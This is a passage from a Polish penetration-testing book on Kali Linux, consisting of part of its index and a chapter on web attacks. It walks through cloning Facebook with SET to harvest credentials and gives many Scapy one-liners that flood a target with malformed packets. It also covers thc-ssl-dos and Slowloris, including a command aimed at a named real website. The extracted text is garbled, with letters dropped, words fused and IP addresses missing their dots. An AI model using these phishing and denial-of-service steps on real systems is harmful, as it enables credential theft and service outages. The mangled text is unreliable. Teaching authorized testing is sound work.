poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
